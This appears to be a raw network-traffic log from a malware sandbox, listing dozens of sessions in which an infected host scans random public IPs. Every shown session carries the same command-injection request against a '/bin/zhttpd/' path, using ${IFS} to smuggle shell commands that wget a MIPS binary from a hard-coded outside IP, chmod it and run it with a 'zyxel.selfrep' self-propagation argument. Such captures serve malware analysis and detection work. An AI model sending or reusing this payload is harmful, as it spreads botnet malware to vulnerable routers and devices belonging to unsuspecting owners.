                                          Jan 14, 2024 15:46:01.704358101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          683192.168.2.235830483.160.107.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704368114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          684192.168.2.2353894179.247.202.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704397917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          685192.168.2.2334086200.169.94.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704444885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          686192.168.2.234334480.33.188.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704508066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          687192.168.2.2360756158.163.224.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704519987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          688192.168.2.2347440137.188.231.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704543114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          689192.168.2.234867488.127.161.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704566956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          690192.168.2.235685232.181.3.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704587936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          691192.168.2.2346770157.89.221.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704617977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          692192.168.2.235516042.47.199.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704617977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          693192.168.2.234234648.225.197.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704648018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          694192.168.2.2356468201.204.71.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704669952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          695192.168.2.2346432135.143.5.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704711914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          696192.168.2.235213871.45.141.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704744101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          697192.168.2.235331680.230.238.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704796076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          698192.168.2.2350534157.229.170.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704826117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          699192.168.2.2345704109.234.171.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704838037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          700192.168.2.2343794175.243.28.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704874992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          701192.168.2.233919679.206.115.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704905987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          702192.168.2.2358812169.174.35.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704940081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          703192.168.2.2343314204.174.116.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704951048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          704192.168.2.2350248111.167.98.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704977036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          705192.168.2.2343942131.254.161.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705008030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          706192.168.2.2340316120.117.48.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705037117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          707192.168.2.2344094170.175.245.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705054998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          708192.168.2.236088899.240.230.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705086946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          709192.168.2.233885276.47.63.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705102921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          710192.168.2.23599542.195.171.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705141068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          711192.168.2.23503242.186.23.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705173969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          712192.168.2.233373687.246.95.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705210924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          713192.168.2.2345732154.254.155.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705230951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          714192.168.2.2349618205.58.162.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705256939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          715192.168.2.235623286.142.114.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705271959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          716192.168.2.234801044.43.159.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705321074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          717192.168.2.2353996161.42.18.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705347061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          718192.168.2.2341610220.78.53.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705359936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          719192.168.2.2342090143.129.172.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705403090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          720192.168.2.2338136165.207.109.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705441952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          721192.168.2.2344118142.40.207.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705485106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          722192.168.2.2347352114.155.143.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705485106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          723192.168.2.2356540210.253.184.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705502033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          724192.168.2.235346236.237.173.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705530882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          725192.168.2.2351622181.203.80.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705590010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          726192.168.2.233353436.244.194.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705590010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          727192.168.2.2356892180.246.161.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705656052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          728192.168.2.2338812135.1.158.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705667973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          729192.168.2.2336346145.202.93.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705692053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          730192.168.2.23588945.21.42.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705718994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          731192.168.2.233824819.215.41.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705734015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          732192.168.2.2342714139.158.242.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705755949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          733192.168.2.233411693.176.163.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705795050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          734192.168.2.234600459.91.81.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705807924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          735192.168.2.234339250.65.1.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705832005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          736192.168.2.235287249.2.101.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705863953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          737192.168.2.2353618131.134.215.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705897093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          738192.168.2.2354046113.196.44.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705924988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          739192.168.2.235199265.22.80.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705941916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          740192.168.2.2351124205.115.122.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705964088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          741192.168.2.2348548193.85.52.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705986023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          742192.168.2.2353366112.242.220.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.705992937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          743192.168.2.234373898.46.195.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706053019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          744192.168.2.235702837.51.204.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706077099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          745192.168.2.2355802190.43.139.12443
                                          TimestampBytes transferredDirectionData
